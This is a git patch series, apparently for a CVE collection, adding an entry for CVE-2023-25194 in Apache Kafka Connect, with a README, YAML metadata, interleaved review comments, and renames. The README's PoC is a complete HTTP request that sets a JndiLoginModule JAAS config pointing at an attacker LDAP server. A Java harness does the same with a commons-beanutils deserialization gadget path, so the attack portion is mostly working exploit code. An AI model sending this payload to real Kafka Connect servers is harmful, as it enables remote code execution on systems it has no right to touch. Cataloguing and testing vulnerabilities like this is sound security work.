From 2cc275cb521b834e2d96b3ce4a8a421d3f4a7d33 Mon Sep 17 00:00:00 2001 
From: Bihe Zhao <13012563808@163.com> Date: Fri, 17 Mar 2023 13:36:33 +0800 Subject: [PATCH 1/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-25194?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2023/CVE-2023-25194/README.md | 54 ++++++++++++++++++ .../2023/CVE-2023-25194/java/.DS_Store | Bin 0 -> 6148 bytes .../2023/CVE-2023-25194/java/.idea/.gitignore | 8 +++ .../CVE-2023-25194/java/.idea/compiler.xml | 13 +++++ .../java/.idea/jarRepositories.xml | 20 +++++++ .../2023/CVE-2023-25194/java/.idea/misc.xml | 14 +++++ .../2023/CVE-2023-25194/java/pom.xml | 28 +++++++++ .../2023/CVE-2023-25194/java/src/.DS_Store | Bin 0 -> 6148 bytes .../CVE-2023-25194/java/src/main/.DS_Store | Bin 0 -> 6148 bytes .../java/src/main/java/Test.java | 25 ++++++++ .../java/target/classes/Test.class | Bin 0 -> 1478 bytes .../java/target/classes/Test2.class | Bin 0 -> 502 bytes .../2023/yaml/CVE-2023-25194.yaml | 23 ++++++++ openkylin_list.yaml | 2 + 14 files changed, 187 insertions(+) create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/README.md create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class create mode 100644 
cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/README.md b/cve/apache-Kafka/2023/CVE-2023-25194/README.md new file mode 100644 index 00000000..6233bc1f --- /dev/null +++ b/cve/apache-Kafka/2023/CVE-2023-25194/README.md 
@@ -0,0 +1,54 @@ +## Description + +A possible security vulnerability has been identified in Apache Kafka Connect. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka 3.4.0. We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. 
Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot. + + +## Poc + +``` +POST /connectors HTTP/1.1 +Host: xxxx:8083 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Content-Type: application/json +Connection: close +Content-Length: 1109 + +{"name": "test", + "config": + { + "connector.class":"io.debezium.connector.mysql.MySqlConnector", + "database.hostname": "xxxxx", + "database.port": "3306", + "database.user": "root", + "database.password": "xxxxxx", + "database.dbname": "xxxx", + "database.sslmode": "SSL_MODE", + "database.server.id": "1234", + "database.server.name": "localhost", + "table.include.list": "MYSQL_TABLES", + "tasks.max":"1", + "topic.prefix": "aaa22", + "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory", + "schema.history.internal.kafka.topic": "aaa22", + "schema.history.internal.kafka.bootstrap.servers": "kafka:9202", + "database.history.producer.security.protocol": "SASL_SSL", + "database.history.producer.sasl.mechanism": "PLAIN", + "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" 
debug=\"true\" group.provider.url=\"xxx\";" + } +} +``` + +## Attention + +1. Import the libs by copy them to the kafka's libs directory. +2. Kafka Connect must be running. (./bin/connect-distributed.sh config/connect-distributed.properties) +3. mysql info must be right, and make sure kafka connect can connect the db. + +## References +- https://github.com/ohnonoyesyes/CVE-2023-25194 +- https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194 \ No newline at end of file diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..437bf16d324cca9b1efd2231476295416454f8de GIT binary patch literal 6148 zcmeHK&u`N(6n<{IHr0gG14z3dS=zN4WkviDmr%xm>oUOsP)U|*L}YQ*q!g*Dlr#J> zT=`4*ci8uA54Gz!4gq>kdj9O^?>Wh5%Z`aijppfnq8|56Gkv34- zG2)lGIZbktY;h&^TIy2(;^uV*ETa_U#k_hg!9Wi=T5P>p75r`-uU!EW#_`d}7O6<70e6wlsp>%^Em zxva;@t8B6u_ijHoMHOeoWM&hxbOOrT*IAL8#mLNyw6wXA>j=6*cih`sE{BgE_x12_ zxa#ZWlfyw@KNvn-t-8UT{d-T3#~<_a!hEqBkiuHGcFW@>d_~27^QUN5`l)$AaA(evS+;3Wx&#o&vl-XgFi&v36*;4ixqZ z0Bj*_4R!t%H(}D6djH5N&alz`ZzvoHT*rCjd``h lUn!{AqZnL1iud5w5Z7D*h8}B&h`{7Wz{((nDDX!WxB#1gc#i-8 literal 0 HcmV?d00001 diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore new file mode 100644 index 00000000..13566b81 --- /dev/null +++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore @@ -0,0 +1,8 @@ +# Default ignored files +/shelf/ +/workspace.xml +# Editor-based HTTP Client requests +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml new file mode 100644 index 00000000..10e71cf9 --- /dev/null +++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml 
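Review bot: in the README hunk, the affected-version story never gets stated as such, and it conflicts with the `scope-of-influence: Apache Kafka 2.3.0` single value in the yaml added by this same patch. The Description itself gives the range: the unsafe override has been possible since Kafka 2.3.0 (with a permissive override policy), is reachable on out-of-the-box Connect clusters from 3.0.0, and `com.sun.security.auth.module.JndiLoginModule` is disabled by default from 3.4.0; put that in an explicit "Affected versions" line instead of leaving the reader to reconstruct it from the paragraph. Two more documentation gaps in the same hunk: the Description names `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config` and `admin.override.sasl.jaas.config` as the vectors, but the PoC sets `database.history.producer.sasl.jaas.config` on a Debezium connector, so the README should say how that connector-specific key reaches a Kafka client; and the mitigations buried at the end of the Description (the `-Dorg.apache.kafka.disallowed.login.modules` system property, a custom connector client config override policy, validating connector configs) deserve their own "Mitigation" section, since that is what an operator reading this file will look for. Minor: the fenced PoC block has no language tag (`http`), "Poc" should read "PoC", and in "Attention" item 1 "Import the libs by copy them to the kafka's libs directory" should read "copy the required jars into Kafka's `libs` directory" and name which jars are meant.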
@@ -0,0 +1,13 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml new file mode 100644 index 00000000..5a2f139c --- /dev/null +++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml @@ -0,0 +1,20 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml new file mode 100644 index 00000000..fe1451cb --- /dev/null +++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml new file mode 100644 index 00000000..17a4f7f1 --- /dev/null +++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml @@ -0,0 +1,28 @@ + + + 4.0.0 + + org.example + CVE-2023-25194 + 1.0-SNAPSHOT + + + 8 + 8 + + + + + org.apache.kafka + kafka-clients + 3.3.0 + + + commons-beanutils + commons-beanutils + 1.9.4 + + + \ No newline at end of file diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..a3a6aff4d353ba5afdaa1127b2d6ab7434c0d075 GIT binary patch literal 6148 zcmeHKy-ve05I&bcQ&mVEKV31rceCnv@PzrOfa!tUL*? z19!HmXn_$#(VcYu?DL%+e~xS)0EkAvy$(l|_unVnHc{r?ZZC9Lntv;$a!<|~S;%wA6N27whyt1}?)Vhtjv3$_f3;ZvYEE;@= zN34w3bMN)yNXFM_BYz80=s*JL6dzC6_mK~5vM>Y805dR?44AXgF3#lF^G7oS%)n1F zK<9&lO6VHQG^(Qm3zY&O(lb&C*45J=(IEq(YcSJ@78IdF5p}3ADTXkagV5pF?;8J1 zqYek5X2x;M%)(?S!XzHTQSKmIja)JV%)lfAbGlig`~Tqk{C_ftTg(76@UIvUR?}-X za7pHF{j@l`YaP@}R1)&bG>${CqOM}}rK`A%ss!y0RS;c+nMSmr@Iye+zy&k#s|>sW Dwb)>d literal 0 HcmV?d00001 
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..161d9f6e0c1fea4f00334944e674eb7c9f9fc825 GIT binary patch literal 6148 zcmeHKO;6iE5S>j@u!Sn+P$Z6)dW}kotA3~#Hw}kgF)9bBf{i0^>w2R&A%`fE&+U)l z+F#PY18;Vh2m-yLf@Y-IH#<9Hd*52SJ4B><)9f`-n}|FpW5Y*tkMKC_9cegE3#j-R zUkZJa7CJ?rA1LzwGr()tqVJT@IVCIW_X%UKE{&LpEaTEyHFE3xCmj`eHR*Q$sz$T* zY;E0J_cpw5@tK~*lVmcjddc{Zd;3}!>9w7tU-RK?(0=h*my;wfhhvkFXG4S>9pq)E zXFWYFv&!VgcEIyJf6(5V&%<}`J3+V;E;_;d!%nvoyb0ef7QVOna{J@n;79SZ)W0nC z3jd{%=MJyoH;mLxSjiUK$J}d+EnFA z4CN{ZWz#Vpx%k?mO($jEjOVyFD_5Z?S9qwvgp-OaN-GQq1GgDy+HRZA|J{Gr|F@H* zCkzM!Pl^H6>c{;arsU4nJCozHHh>;OSvan?xJ-dzj$*{}QM?5;0)M~;FmhO1ga;xQ N0Yif{!oY(va0S~CVx#~7 literal 0 HcmV?d00001 diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java new file mode 100644 index 00000000..72119106 --- /dev/null +++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java 
@@ -0,0 +1,25 @@ +import org.apache.kafka.clients.producer.KafkaProducer; +import org.apache.kafka.clients.producer.Producer; +import org.apache.kafka.clients.producer.ProducerRecord; + +import java.util.Properties; + +public class Test { + public static void main(String[] args) { + Properties props = new Properties(); + props.put("sasl.mechanism","SCRAM-SHA-256"); + props.put("security.protocol","SASL_SSL"); +// props.put("security.protocol","SASL_PLAINTEXT"); + props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " + + "required user.provider.url=\"ldap://127.0.0.1:1389/deserialCommonsBeanutils1\" " + + "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " + + "group.provider.url=\"xxx\";"); + props.put("bootstrap.servers", "localhost:9092"); + props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer"); + props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer"); + props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer"); + props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer"); + + Producer producer = new KafkaProducer<>(props); + } +} 
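Review bot: `ProducerRecord` is imported but never used, and the `key.deserializer`/`value.deserializer` entries are consumer settings that a `KafkaProducer` ignores (kafka-clients logs them as unknown configs), so drop them together with the unused import. The `Producer` is created with the raw type and never closed; `Producer<String, String> producer = new KafkaProducer<>(props)` inside a try-with-resources is the idiomatic form. More importantly the file carries no documentation: it builds a plain kafka-clients 3.3.0 producer (per the `pom.xml` in this patch) with a hard-coded `sasl.jaas.config` pointing at `ldap://127.0.0.1:1389/...`, which exercises the JAAS login path of the client library directly rather than the Kafka Connect REST path the README describes. A class-level comment should say that this is what the harness is for, and note that, per the README, on 3.4.0 with `com.sun.security.auth.module.JndiLoginModule` disallowed by default the same constructor is expected to fail at construction instead of contacting the LDAP URL, which makes this file a usable regression check for the fix.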
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class b/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class new file mode 100644 index 0000000000000000000000000000000000000000..c16dc92d9d3f8a7386d26d7e7ac4fbec5ab88194 GIT binary patch literal 1478 zcmb7ETTdHD6#fPSUK}8>P}-z7$88d>yD8x|f}Xjo`k*eqkKf*EX=u~Wt_!|1k*WlBP6e&Gef@P5)3 z3^zR)i>F!C66!f`g@o8%67cW^SJLR0;BeZNnsRv0g-*99I^r^Bn4ACJJK=rqhCJ@L zeyU{L*~+tX)gk|x|1dL*^is%3=r80C62@)!mLQ{5&9NJkR6vMKYsE*5fJm?Dd zl)pUXZV*Zlr`jDjnb_Q$BIo|y{CRIMz|mXe*}gv0b!3;SRs1AVfp{X#-p0&o9J7sa zyo>i3X7kNlnT}yna~(R72)aC$I%1gc_mB1tR{XE_R#w+H#_<_GXPDL^$dpXa9U3!D zf+VE1_RHusfXd2ZQir6w48eVo2oo+TCG*@W{r{dfhG$dacwls(=PC*tYCkt)IG-|R? z*YXulC20jwzqp*G2(|k>%*2&^lcvNV))d%yn*#o2Q4=^-q<=G)`~S@T#t?o$Z$qm+ zx_X9Zl<=Q>_pEgy0)k4tjLydV8)Pj^Ti20=>kz}O%g`&Fr5lYqc!$14<~Iap_)X_6 z(p-8odXFq#fc=!4Z__!NgJrx=@_6BZ5AY#rWB3Rk6Jmn@K#3mUyVn>xzCg)avWM-F zpE3IFl3li~LKw3vg>b_jFN6tuvJh?#geiNvKn~g8%>k literal 0 HcmV?d00001 diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class b/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class new file mode 100644 index 0000000000000000000000000000000000000000..7dd11a74d3a939a1046cde14175f12cd700b109d GIT binary patch literal 502 zcmb7BO-lnY5PjLUyX{(Sty=Zyt%@`t-YS9!9wh3ar68WtZP=!Cv#=k6Kg&}=!5`p{ z5+|up1TW?=A8+2gNhY6PZyx~8aTub8y#U=1p7r|y4jB9kZFF(TQ0X0y8LHRmR57%K zHtN1iCMp}r$%2rMNF%uz%S_w+2dow|oihYtr1IiyK<$athN0Vg5_9=1`9hkQ4~tBj zc;Mt^7E{B{A7vUkH&ZRrSev_aTH2v~5v2*wOT%*&m6bffa-lH&+B~Py{rvi7i5G^A(AC7JG;HxI{&)1?-oRD$#r=(p?eJLYwe932dW7 KmR3u-huv>JUuy0E literal 0 HcmV?d00001 diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml new file mode 100644 index 00000000..43b5846e --- /dev/null +++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml 
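Review bot: `target/classes/Test.class`, `target/classes/Test2.class` and the three `.DS_Store` files in this and the preceding binary hunks are build output and Finder metadata, and the `.idea/` files earlier in the patch are IDE state; none of them belong in the repository, and a `.gitignore` at the project root covering `target/`, `.DS_Store` and `.idea/` would keep them out. `Test2.class` also has no `Test2.java` under `src/main/java` in this patch, so the committed binaries do not even correspond to the committed source. Patches 2/7 through 4/7 of this series then rename the directory and delete these files again; squash those into this commit so the series lands without the churn.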
@@ -0,0 +1,23 @@ +id: CVE-2023-25194 +source: + https://github.com/ohnonoyesyes/CVE-2023-25194 +info: + name: Apache Kafka is a distributed event store and stream-processing platform. It is an open-source system developed by the Apache Software Foundation written in Java and Scala. + severity: high + description: A possible security vulnerability has been identified in Apache Kafka Connect. + This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. + When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. + Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. + scope-of-influence: + Apache Kafka 2.3.0 + reference: + - https://github.com/ohnonoyesyes/CVE-2023-25194 + - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: Deserialization of Untrusted Data \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7c4549f5..d7b9b900 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml 
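Review bot: `scope-of-influence: Apache Kafka 2.3.0` records a single version, while the description a few lines above says the issue exists "since Apache Kafka 2.3.0" and the README in this same patch says the login module is disabled by default in 3.4.0; record the range (2.3.0 up to, not including, 3.4.0) and, since the README distinguishes it, that out-of-the-box Connect configurations are exposed only from 3.0.0. `name:` holds a two-sentence product description rather than a product name; move that text under `description` and keep `name: Apache Kafka`. The multi-line `description` is written as an indented plain scalar, which only parses as long as none of the continuation lines contains `: ` or ` #`; a literal block (`description: |`) is the robust form, and patch 4/7 of this series switches to it anyway, one more reason to squash the series before merging.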
@@ -12,6 +12,8 @@ cve: - CVE-2022-24706 apache-Dubbo: - CVE-2021-43297 + apache-Kafka: + - CVE-2023-25194 apache-log4j: - CVE-2021-44228 apache-solr: -- Gitee From 687b29ddf805aef5e3b3ecb1b365e9f8ed84e5e2 Mon Sep 17 00:00:00 2001 
From: Bihe Zhao <13012563808@163.com> Date: Fri, 17 Mar 2023 13:38:57 +0800 Subject: [PATCH 2/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVE-2023-25194?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../{java => CVE-2023-25194-java}/.DS_Store | Bin .../{java => CVE-2023-25194-java}/.idea/.gitignore | 0 .../.idea/compiler.xml | 0 .../.idea/jarRepositories.xml | 0 .../{java => CVE-2023-25194-java}/.idea/misc.xml | 0 .../{java => CVE-2023-25194-java}/pom.xml | 0 .../{java => CVE-2023-25194-java}/src/.DS_Store | Bin .../src/main/.DS_Store | Bin .../src/main/java/Test.java | 0 .../target/classes/Test.class | Bin .../target/classes/Test2.class | Bin 11 files changed, 0 insertions(+), 0 deletions(-) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.DS_Store (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/.gitignore (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/compiler.xml (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/jarRepositories.xml (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/misc.xml (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/pom.xml (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/src/.DS_Store (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/src/main/.DS_Store (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/src/main/java/Test.java (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/target/classes/Test.class (100%) rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/target/classes/Test2.class (100%) 
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/pom.xml similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/pom.xml 
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/java/Test.java similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/java/Test.java diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test.class similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test.class diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test2.class similarity index 100% rename from cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test2.class -- Gitee From 4939e3ddb416024bb55793800011dae5d1f00bad Mon Sep 17 00:00:00 2001 
From: Bihe Zhao <13012563808@163.com> Date: Fri, 17 Mar 2023 13:42:43 +0800 Subject: [PATCH 3/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVE-2023-25194?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../CVE-2023-25194-java/.idea/.gitignore | 8 -------- .../CVE-2023-25194-java/.idea/compiler.xml | 13 ------------ .../.idea/jarRepositories.xml | 20 ------------------- .../CVE-2023-25194-java/.idea/misc.xml | 14 ------------- 4 files changed, 55 deletions(-) delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore deleted file mode 100644 index 13566b81..00000000 --- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# Default ignored files -/shelf/ -/workspace.xml -# Editor-based HTTP Client requests -/httpRequests/ -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml deleted file mode 100644 index 10e71cf9..00000000 --- a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml +++ /dev/null @@ -1,13 +0,0 @@ - - - - - - - - - - - - - \ No newline at end of file diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml deleted file mode 100644 index 5a2f139c..00000000 
